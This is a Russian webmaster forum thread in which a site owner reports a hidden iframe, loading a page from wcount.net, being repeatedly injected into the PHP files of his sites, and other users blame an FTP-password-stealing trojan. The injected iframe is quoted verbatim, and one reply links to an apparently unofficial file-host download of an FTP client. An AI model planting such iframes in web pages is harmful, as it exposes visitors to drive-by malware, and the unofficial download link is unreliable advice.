- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Заранее прошу прощения - если тема не соответствует ветке форума, более подходящего места не нашел. :(
Ситуация следующая. Есть хостинг, на нем штук 15 моих сайтов. Во все файлы index.php (и некоторых других файлов, тоже с расширением .php) был каким то образом вставлен следующий код:
<html><body><div style="display:none"><iframe src="http://wcount.net/com/index.php" width="320" height="240"></iframe></div></body></html>
Этот код останавливает работу сайтов - зловредный код. После того как код был удален из этих сайтов - он появлся снова и так каждые несколько минут после того как я удаляю его :(.
Этот код попал также в файлы скриптов, расположенных на хостинги, которые нельзя просто так запустить не зная правильного адресса. Делаю вывод что взломали хостинг.
Вопросы
1. Правильно ли что взломали хостинг?
2. Можно ли как то узнать откуда идет угроза?
3. Что можно сделать что бы опять все нормально работало?
4. Что вы можете сказать по этому поводу?
Заранее спасибо. :cool:
Взлом мог быть откуда угодно, от угона паролей до уязвимостей в движке сайтов.
Проконсультируйтесь с вашим хостером, если вы на виртуале, нужно смотреть логи заходов по фтп\ссх, логи апача на предмет подозрительных конектов, проверить кронтабы и т.д.
iph, +1 ............
Эта тема поднималась сотни раз уже. Никогда не храните пароли в FTP-клиентах. И никому не давайте так делать. Все пароли должны быть в голове, а не в компьютере.
С вероятностью 99,9% уверен, что это просто троян в компьютере вебмастера.
+1
Либо используйте специализированный фтп-клиент CuteFTP.Pro, а не Total Commander и прочие пародии на клиенты фтп. CuteFTP.Pro является специализированным клиентом фтп, украсть пароль из него трояну будет крайне сложно.
Скачать этот клиент можно отсюда: http://astronomy.net.ua/rapidshare/856669
Первым делом смените пароль и проверьте комп на наличие троянов. Была подобная проблема, появлялся лишний код в индексных файлах. Причина была в наличии трояна на компе, который заливал этот зловредный код в момент соединения с сервером по FTP.
ovm добавил 13.03.2009 в 19:36
пока писал уже ответили
Вот еще бы кто посоветовал как себя заставить пользоваться другим фтп клиентом если всегда пользовался тоталкомандером :)
+1
Либо используйте специализированный фтп-клиент CuteFTP.Pro, а не Total Commander и прочие пародии на клиенты фтп. CuteFTP.Pro является специализированным клиентом фтп, украсть пароль из него трояну будет крайне сложно.
Скачать этот клиент можно отсюда: http://astronomy.net.ua/rapidshare/856669
Так думают все пользователи CuteFTP пока у них не появляются вирусы на сайтах! :D
Вот еще бы кто посоветовал как себя заставить пользоваться другим фтп клиентом если всегда пользовался тоталкомандером
А вы попробуйте. Тоталкомандер будете вспоминать как страшный сон.
Определенно украли логин\пароль на фтп.
Был такой вирус на TotalCommander
А к текущему разделу какое это имеет отношение?